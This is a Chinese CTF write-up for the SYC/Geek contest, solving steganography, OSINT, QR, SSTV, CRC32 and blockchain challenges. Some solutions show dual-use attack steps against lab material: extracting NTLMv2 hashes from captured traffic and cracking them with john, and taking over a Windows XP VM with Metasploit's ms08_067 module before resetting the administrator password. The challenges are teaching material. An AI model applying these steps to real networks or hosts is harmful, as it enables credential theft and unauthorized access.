从1.jpg提取出zip压缩包,得到secret.png,为Standard Galactic Alphabet字体,利用在线网站解出信息为:I WANT TO GO TO LIQUOR CITY。
LIQUOR CITY=酒城=泸州市,城市拼音:Luzhou。
根据图片信息:时间8.25 20:19 马上起飞,在flightstats上查询深圳-泸州的航班号为:CZ8579。
flag:SYC{CZ8579_Luzhou}
Qingwan心都要碎了
Qingwan和Yxx一起去旅游,但是Qingwan睡的太死啦,Yxx丢下她一个人去玩了,她一觉起来只看见Yxx发的朋友圈,能帮Qingwan找到她吗? flag格式:SYC{地点名字}
百度,以图搜图。
SYC{重庆中国三峡博物馆}
xqr
Qrcode can deliver binary msg
png分离得到两张png图片,按像素值异或操作即得到新二维码。
1 | from PIL import Image |
flag:SYC{hOp3_u_h@ve_Fun}
DEATH_N1TE
“你看见了《DEATH NOTE》上面的名字,这时,Arahat0给你传了两个文件,并留言:” “[他拥有死神之眼,请小心,他在找你,还剩1920秒…]” “<当前时间 10:52>”。flag有两段
webp文件在线转gif,使用gifsplitter拆分为880张图片。
猜测宽高为 40*22,合并:montage *.bmp -tile 40x22 -geometry +0+0 ../out.png
拼图:gaps --image=out.png --size=48 --save
得到文字:XzE0X0tpMTE0Un0==,base64解码得flag后半段:_14_Ki114R}。
mp3文件提取SSTV信息:sstv -d L1.wav -o 1.png
得到的图片里的文字为flag前半段:SYC{H4xr0t0r。
flag:SYC{H4xr0t0r_14_Ki114R}
窃听风云
Hacker捕获到了一段敌对公司的对话信息流量,你能从流量中分析出Jack的密码吗,flag为SYC{password}
NTLMSSP流量,利用提取工具 ntlmssp_extract 提取NTLM得:
jack::WIDGETLLC:2af71b5ca7246268:2d1d24572b15fe544043431c59965d30:0101000000000000040d962b02edd901e6994147d6a34af200000000020012005700490044004700450054004c004c004300010008004400430030003100040024005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c0003002e0044004300300031002e005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c00050024005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c0007000800040d962b02edd90106000400020000000800300030000000000000000000000000300000078cdc520910762267e40488b60032835c6a37604d1e9be3ecee58802fb5f9150a001000000000000000000000000000000000000900200048005400540050002f003100390032002e003100360038002e0030002e0031000000000000000000
保存为hash文件,再用john解:
john hash --wordlist=rockyou.txt
结果:iamjackspassword (jack)
flag:SYC{iamjackspassword}
extractMe
Try to extract me!
4字节CRC32爆破,利用CRC32 Tools分别爆破8段字符串:
python crc32.py reverse 0xXXXXXXXX
拼接得flag:SYC{_cR@ck_1s_Useful_sometime$_}
时代的眼泪
2001年的大屁股电脑,到了2023年会被揍得多惨呢? 链接: https://pan.baidu.com/s/1GuvryuThIMn_fzhstWaKBA?pwd=geek 提取码: geek
WinXP虚拟机,用VMWare加载但无登录密码。
参考:使用MSF 利用 ms08_067 对 XP 进行渗透
先对网段扫描IP:nmap -sC -sV 192.168.79.0/24
得到IP后,使用MSF攻击:
1 | msf6 > search ms08_067 |
getshell之后,使用net命令修改administrator密码:
net user administrator 123456
进入系统,桌面背景图得flag:SYC{You_defeated_me_after_22_years}。
SimpleConnect
Just so so 属于blockchain 题目链接:http://47.109.106.62:1234/
用Remix编译后,执行 airdrop() 函数,即满足 isSolved() 条件,
得到flag:SYC{kajd_u_iaak___hdskj_a}。
give_me_Goerlieth
Great 属于blockchain 题目链接:http://47.109.106.62:1235/
转账即可。
DEATH_N2TE
“你知道了真相,正带上《DEATH NOTE》准备逃离,恰好,Muscial发给你一个视频,并说:” “[这里记下了他的真名以及照片,请写在那本笔记上面,我和Arahat0都被他看见了真名…]”。
mp4分帧:ffmpeg -i kira.mp4 %05d.png
提取每一帧的列,组合:
1 | from PIL import Image |
start=5的时候,得flag:SYC{we1c0m4_T0_De@tH_W0r1d}。
窃听风云-V2
这次Hacker捕获到了Jack登录邮件系统的流量,你还能从流量中分析出Jack的密码吗,flag为SYC{password}
SMTP流量,wireshark 解析ntlmssp,按照
Extracting NTLM Hash Values from a Wireshark packet capture
构造出ntlmssp:
jack::WidgetLLC.Internal:3e3966c8cacd29f7:ddd46fd8f78c262eae16918f66185497:010100000000000050fd26d235edd9011219408ccb8a364800000000020012005700490044004700450054004c004c0043000100100043004c00490045004e00540030003300040024005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c000300360043004c00490045004e005400300033002e005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c00050024005700690064006700650074004c004c0043002e0049006e007400650072006e0061006c000700080050fd26d235edd90106000400020000000800300030000000000000000000000000300000c78e803920758ec5672c36696ee163f6a4e61c8b5463c247daef8571677995a40a001000000000000000000000000000000000000900200053004d00540050002f0075006e007300700065006300690066006900650064000000000000000000
再用john爆破即可:john token.txt --wordlist=rockyou.txt
得到 jack100589barney (jack),flag:SYC{jack100589barney}。
